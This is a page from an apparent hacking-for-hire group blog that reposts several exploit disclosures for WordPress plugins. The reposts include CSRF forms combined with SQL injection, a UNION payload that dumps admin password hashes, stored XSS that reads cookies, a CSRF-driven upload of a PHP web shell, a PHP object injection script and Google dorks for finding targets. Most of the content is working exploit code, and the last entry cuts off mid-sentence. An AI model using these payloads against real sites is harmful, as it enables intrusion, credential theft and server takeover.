Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130995

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite Wordpress Plugin v1.4.6
# Submitter: Nitin Venkatesh
# Product: Unite Gallery Lite Wordpress Plugin
# Product URL: https://wordpress.org/plugins/unite-gallery-lite/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
Neutralization of Special Elements used in an SQL Command ('SQL
Injection')[CWE-89]
# Affected Versions: v1.4.6 and possibly below.
# Tested versions: v1.4.6
# Fixed Version: v1.5
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
# Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
# CVE Status: New & Unassigned

## Product Information:

The Unite Gallery is all in one image and video gallery for WordPress.

## Vulnerability Description:

The admin forms of the Unite Gallery Lite Wordpress Plugin are susceptible
to CSRF. Additionally, the following parameters were found to be
susceptible to SQLi -

Form submitted to /wp-admin/admin-ajax.php:
- data[galleryID]

Form submitted to /wp-admin/admin.php:
- galleryid
- id

## Proof of Concept:

<!DOCTYPE html>
<html>
<head>
<title>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</title>
</head>
<body>
<h1>CSRF + SQLi in Unite Gallery Lite Wordpress Plugin v1.4.6</h1>
<p>CSRF - Create Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='create_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][category]" value='new' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Update Gallery</p>
<form action="http://localhost/wp-admin//admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='update_gallery' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[main][title]" value='test 2' />
<input type="hidden" name="data[main][alias]" value='test2' />
<input type="hidden" name="data[main][shortcode]" value='[unitegallery
test2]' />
<input type="hidden" name="data[main][category]" value='3' />
<input type="hidden" name="data[main][full_width]" value='true' />
<input type="hidden" name="data[main][gallery_width]" value='1000' />
<input type="hidden" name="data[main][gallery_min_width]" value='150' />
<input type="hidden" name="data[params][tile_width]" value='160' />
<input type="hidden" name="data[params][tile_height]" value='160' />
<input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
<input type="hidden" name="data[params][theme_carousel_align]"
value='center' />
<input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
<input type="hidden" name="data[params][gallery_shuffle]" value='false' />
<input type="hidden" name="data[params][tile_image_resolution]"
value='medium' />
<input type="hidden" name="data[params][carousel_padding]" value='8' />
<input type="hidden" name="data[params][carousel_space_between_tiles]"
value='20' />
<input type="hidden" name="data[params][carousel_scroll_duration]"
value='500' />
<input type="hidden" name="data[params][carousel_scroll_easing]"
value='easeOutCubic' />
<input type="hidden" name="data[params][carousel_autoplay]" value='true' />
<input type="hidden" name="data[params][carousel_autoplay_timeout]"
value='3000' />
<input type="hidden" name="data[params][carousel_autoplay_direction]"
value='right' />
<input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
value='true' />
<input type="hidden" name="data[params][theme_enable_navigation]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_enable_play]"
value='true' />
<input type="hidden" name="data[params][theme_navigation_align]"
value='center' />
<input type="hidden" name="data[params][theme_navigation_offset_hor]"
value='0' />
<input type="hidden" name="data[params][theme_navigation_position]"
value='bottom' />
<input type="hidden" name="data[params][theme_navigation_margin]"
value='20' />
<input type="hidden" name="data[params][theme_space_between_arrows]"
value='5' />
<input type="hidden" name="data[params][carousel_navigation_numtiles]"
value='3' />
<input type="hidden" name="data[params][position]" value='center' />
<input type="hidden" name="data[params][margin_top]" value='0' />
<input type="hidden" name="data[params][margin_bottom]" value='0' />
<input type="hidden" name="data[params][margin_left]" value='0' />
<input type="hidden" name="data[params][margin_right]" value='0' />
<input type="hidden" name="data[params][tile_enable_action]" value='true' />
<input type="hidden" name="data[params][tile_as_link]" value='false' />
<input type="hidden" name="data[params][tile_link_newpage]" value='true' />
<input type="hidden" name="data[params][tile_enable_border]" value='true' />
<input type="hidden" name="data[params][tile_border_width]" value='3' />
<input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
/>
<input type="hidden" name="data[params][tile_border_radius]" value='0' />
<input type="hidden" name="data[params][tile_enable_outline]" value='true'
/>
<input type="hidden" name="data[params][tile_outline_color]"
value='#8b8b8b' />
<input type="hidden" name="data[params][tile_enable_shadow]" value='false'
/>
<input type="hidden" name="data[params][tile_shadow_h]" value='1' />
<input type="hidden" name="data[params][tile_shadow_v]" value='1' />
<input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
<input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
<input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
/>
<input type="hidden" name="data[params][tile_enable_image_effect]"
value='false' />
<input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
/>
<input type="hidden" name="data[params][tile_image_effect_reverse]"
value='false' />
<input type="hidden" name="data[params][tile_enable_overlay]" value='true'
/>
<input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
/>
<input type="hidden" name="data[params][tile_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_enable_icons]" value='true' />
<input type="hidden" name="data[params][tile_show_link_icon]" value='false'
/>
<input type="hidden" name="data[params][tile_space_between_icons]"
value='26' />
<input type="hidden" name="data[params][tile_enable_textpanel]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][tile_textpanel_always_on]"
value='false' />
<input type="hidden" name="data[params][tile_textpanel_appear_type]"
value='slide' />
<input type="hidden" name="data[params][tile_textpanel_padding_top]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
value='8' />
<input type="hidden" name="data[params][tile_textpanel_padding_left]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_padding_right]"
value='11' />
<input type="hidden" name="data[params][tile_textpanel_bg_color]"
value='#000000' />
<input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
value='0.6' />
<input type="hidden" name="data[params][tile_textpanel_title_color]"
value='#ffffff' />
<input type="hidden" name="data[params][tile_textpanel_title_text_align]"
value='left' />
<input type="hidden" name="data[params][tile_textpanel_title_font_size]"
value='14' />
<input type="hidden" name="data[params][tile_textpanel_title_bold]"
value='true' />
<input type="hidden" name="data[params][lightbox_type]" value='wide' />
<input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
value='true' />
<input type="hidden" name="data[params][lightbox_slider_control_zoom]"
value='true' />
<input type="hidden" name="data[params][gallery_mousewheel_role]"
value='zoom' />
<input type="hidden" name="data[params][lightbox_overlay_opacity]"
value='1' />
<input type="hidden" name="data[params][lightbox_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_top_panel_opacity]"
value='0.4' />
<input type="hidden" name="data[params][lightbox_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
/>
<input type="hidden" name="data[params][lightbox_numbers_color]"
value='#e5e5e5' />
<input type="hidden" name="data[params][lightbox_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_textpanel_width]"
value='550' />
<input type="hidden" name="data[params][lightbox_textpanel_source]"
value='title' />
<input type="hidden" name="data[params][lightbox_textpanel_title_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_text_align]" value='left' />
<input type="hidden"
name="data[params][lightbox_textpanel_title_font_size]" value='14' />
<input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
value='0.6' />
<input type="hidden" name="data[params][lightbox_compact_overlay_color]"
value='#000000' />
<input type="hidden" name="data[params][lightbox_arrows_position]"
value='sides' />
<input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
value='false' />
<input type="hidden" name="data[params][lightbox_compact_show_numbers]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_numbers_size]"
value='14' />
<input type="hidden" name="data[params][lightbox_compact_numbers_color]"
value='#e5e5e5' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
<input type="hidden"
name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
<input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
value='true' />
<input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
value='title' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
/>
<input type="hidden"
name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border]" value='true' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_width]" value='10'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_color]"
value='#ffffff' />
<input type="hidden"
name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
/>
<input type="hidden"
name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
<input type="hidden" name="data[params][include_jquery]" value='true' />
<input type="hidden" name="data[params][js_to_body]" value='false' />
<input type="hidden" name="data[params][compress_output]" value='false' />
<input type="hidden" name="data[params][gallery_debug_errors]"
value='false' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p>CSRF - Add Items</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='add_item' />
<input type="hidden" name="gallery_type" value='' />
<input type="hidden" name="data[type]" value='html5video' />
<input type="hidden" name="data[title]" value='test' />
<input type="hidden" name="data[description]" value='' />
<input type="hidden" name="data[urlImage]" value='' />
<input type="hidden" name="data[urlThumb]" value='' />
<input type="hidden" name="data[urlVideo_mp4]" value='
http://video-js.zencoder.com/oceans-clip.mp4' />
<input type="hidden" name="data[urlVideo_webm]" value='
http://video-js.zencoder.com/oceans-clip.webm' />
<input type="hidden" name="data[urlVideo_ogv]" value='
http://video-js.zencoder.com/oceans-clip.ogv' />
<input type="hidden" name="data[catID]" value='4' />
<input type="submit" value="submit" />
</form>

<p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
<form action="http://localhost/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value='unitegallery_ajax_action' />
<input type="hidden" name="client_action" value='get_cat_items' />
<input type="hidden" name="gallery_type" value='ug-carousel' />
<input type="hidden" name="data[catID]" value='3' />

<!-- SQLi -->
<input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
(SELECT(SLEEP(5)))rock)' />
<input type="submit" value="submit" />
</form>

<p> CSRF + SQLi - Action buttons</p>
<ul>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a></li>
<li>
<a href="
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
">
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
</a>
</li>
</ul>
</body>
</html>

## Solution:

Upgrade to v1.5 or higher

## Disclosure Timeline:

2015-06-06 - Discovered. Reported to developer.
2015-06-10 - Updated version released.
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
HireHackking 
# Title  : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/

Vulnerable Page:
/class-admin-upgrade.php


Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';


Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>
HireHackking 
================================================================
CSRF/Stored XSS Vulnerability in Ultimate profile Builder Plugin 
================================================================


. contents:: Table Of Content

Overview
========

* Title :CSRF and Stored XSS Vulnerability in Ultimate Profile Builder  Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://downloads.wordpress.org/plugin/ultimate-profile-builder.zip
* Severity: HIGH
* Version Affected: Version 2.3.3 and mostly prior to it
* Version Tested : Version 2.3.3
* version patched:

Description 
===========

Vulnerable Parameter 
--------------------

* Label
* CSS Class atribute

About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Goto settings -> Ultimate profile Builder

2. Insert this payload ## <script>alert("1")</script> ## Into  above mention Vulnerable parameter Save settings and see XSS in action

3. Visit Ultimate Profile Builder settings page of this plugin anytime later and you can see the script executing as it is stored.

Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below

CSRF POC Code
=============

* <html>
*  <body>
*    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=UltimatePB_Field" method="POST">
*      <input type="hidden" name="select_type" value="heading" />
*      <input type="hidden" name="field_user_groups[]" value="administrator" />
*      <input type="hidden" name="field_name" value="<script>alert("1")</script>" />
*      <input type="hidden" name="field_value" value="<script>alert("1")</script>" />
*      <input type="hidden" name="field_class" value="<script>alert("1")</script>" />
*      <input type="hidden" name="field_maxLenght" value="" />
*      <input type="hidden" name="field_cols" value="" />
*      <input type="hidden" name="field_rows" value="" />
*      <input type="hidden" name="field_Options" value="" />
*      <input type="hidden" name="field_Des" value="<script>alert("1")</script>" />
*      <input type="hidden" name="field_ordering" value="1" />
*      <input type="hidden" name="field_submit" value="Save" />
*      <input type="submit" value="Submit request" />
*    </form>
*  </body>
* </html>

Mitigation 
==========
No Update

Change Log
==========
no Update

Disclosure 
==========
11-April-2015 Reported to Developer
No Update
credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
HireHackking 
# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/

# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 - Description:

Type user access: register user.

$_POST[‘CatID’] is not escaped.

http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

2 - Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 – Using:

<*form method="post"
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT
user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">

*delete “*” in code*

3 - Timeline:

- 22/05/2017 – Discovered
- 24/05/2017 – Vendor not finded
- **/06/2017 - Corrected

***Rename plugin txt to zip. Problem with gmail block.
-- 
*Atenciosamente*

*Lenon Leite*
HireHackking 
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps

1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin
for all your product catalogue needs. It has +63.000 downloads, +4.000
active installations.

Product Name and Description and File Upload formulary of plugin Ultimate
Product Catalog lacks of proper CSRF protection and proper filtering.
Allowing an attacker to alter a product pressented to a customer or the
wordpress administrators and insert XSS in his product name and
description. It also allows an attacker to upload a php script though a
CSRF due to a lack of file type filtering when uploading it.

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com

- 22/04/2015: Response from etoilewebdesign.com

 and fixed two SQLi in 3.1.3 but not these vulnerabilities.
        - 28/04/2015: Fixed version in 3.1.5 without notifying me.

3. Vulnerable code:

    In file html/ProductPage multiple lines.

3. Proof of concept:

https://www.youtube.com/watch?v=roB_ken6U4o


 ----------------------------------------------------------------------------------------------
   ------------- CSRF & XSS in Product Description and Name -----------

 ----------------------------------------------------------------------------------------------

<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
    action='http://
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
    target="csrf-frame"
    id="csrf-form">
        <input type='hidden' name='action' value='Edit_Product'>
        <input type='hidden' name='_wp_http_referer'
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
        <input type='hidden' name='Item_Name' value="Product
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
        <input type='hidden' name='Item_Slug' value='asdf'/>
        <input type='hidden' name='Item_ID' value='16'/>
        <input type='hidden' name='Item_Image' value='
http://i.imgur.com/6cWKujq.gif'>
        <input type='hidden' name='Item_Price' value='666'>
        <input type='hidden' name='Item_Description' value="Product
description says<script>alert('Product description says:
'+document.cookie)</script>"/>
        <input type='hidden' name='Item_SEO_Description' value='seo desc'>
        <input type='hidden' name='Item_Link' value=''>
        <input type='hidden' name='Item_Display_Status' value='Show'>
        <input type='hidden' name='Category_ID' value=''>
        <input type='hidden' name='SubCategory_ID' value=''>
        <input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>



 ----------------------------------------------------------------------------------------------
   -------- CSRF & File Upload in Product Description and Name ------

 ----------------------------------------------------------------------------------------------

<html>
    <body onload="submitRequest();">
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST",
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",
true);
            xhr.setRequestHeader("Host", "<web>");
            xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            xhr.setRequestHeader("Cache-Control", "max-age=0");
            xhr.setRequestHeader("Accept-Language",
"en-US,en;q=0.8,es;q=0.6");
            xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37
Safari/537.36");
            xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
            xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
            var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data;
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
              "Content-Type: application/octet-stream\r\n" +
              "\r\n" +
              "<?php\r\n" +
              "exec($_GET['c'],$output);\r\n" +
              "foreach ($output as $line) {\r\n" +
              "echo \"<br/>\".$line;\r\n" +
              "}\r\n" +
              "?>\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data; name='submit'\r\n" +
              "\r\n" +
              "Add New Products\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
      </form>
  </body>
</html>

Te file cooldog.php is no available in path http://
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php


4. Solution:

    Update to version 3.1.5
HireHackking 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

     Ultimate Product Catalogue is A responsive and easily customizable
plugin for all your product catalogue needs. It has +59.000 downloads,
+3.000 active installations.

 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor explores a product published by the web administrator

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:

    File Functions/Shortcodes.php line 779

3. Proof of concept

    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b

4. Solution:

    Update to version 3.1.3
HireHackking 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +59.000 downloads,
+3.000 active installations.

    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".

2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:

    In file Functions/Process_Ajax.php line 67:
 [...]
$Item_ID = $_POST['Item_ID'];
        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
WHERE Item_ID=" . $Item_ID);
[...]

3. Proof of concept:

    POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: <wordpress host>
  [...]
  Cookie: wordpress_f305[...]

  Item_ID=2 AND SLEEP(5)&action=record_view

4. Solution:

    Update to version 3.1.3
HireHackking 
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24] 
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]

tested on app version 4.2.23, 4.2.24

we can send an evil cookie (login not required) to vulnerable function
1. vulnerable code on Functions/Process_Ajax.php <= tested

   203 // Adds an item to the plugin's cart
   204 function UPCP_Add_To_Cart() {
   205 global $woocommerce;
   206 global $wpdb;
   207 global $items_table_name;
   208
   209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
   210
   211 if ($WooCommerce_Checkout == "Yes") {
   212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
   213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
   214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
   215 }
   216
   217 if (isset($_COOKIE['upcp_cart_products'])) {
   218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
   219 }
   220 else {
   221 $Products_Array = array();
   222 }
   223
   224 $Products_Array[] = $_POST['prod_ID'];
   225 $Products_Array = array_unique($Products_Array);
   226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
   227 }
   228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
   229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );

2. vulnerable code on Functions/Shortcodes.php <= not tested
  
POC
1. use a WP plugin to test php object injection, 
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/

2. make a request 
#-----------------------------------
#! /usr/bin/python
import requests
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
data = {'action':'upcp_add_to_cart'}
headers = {
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)

print r.content

#------------------------------------
HireHackking 
# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection
# Date: 2016-07-28
# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/"
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/
# Software Link: 
# Version: <=3.9.8
# Tested on: windows 7 + firefox. 

====================
 DESCRIPTION
====================

A vulnerability has been discvered in the wordpress Ultimate Product Catalog by affecting v3.9.8 and below (tested).
Due to a unsanitized parameters passed to the shorcode function `Insert_Product_Catalog`  [ "product-catalogue" ]
located in `/Funtions/Shortcodes.php` line 4:

function Insert_Product_Catalog($atts) {	
	// Select the catalogue information from the database
	...

	$Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id);
	$CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position");
	...
	
	return $ProductString;
}

The $id parameter is extracted with `extract` function from $atts. This is a vulnerability with which can be exploited by creating  shortcodes with 
malicious attributes, exploitable only by administrators, editors, authors. But in file `/Functions/Process_Ajax.php`  line 113...

function UPCP_Filter_Catalogue() {
	$Path = ABSPATH . 'wp-load.php';
	include_once($Path);
	
	$id = $_POST['id']; <-- we can control this value!!

	...
	
	echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']");
}


This is interesting because that function calls `do_shortcode` executing the shortcode 'product-catalogue' as a result, this calls `Insert_Product_Catalog` wich 
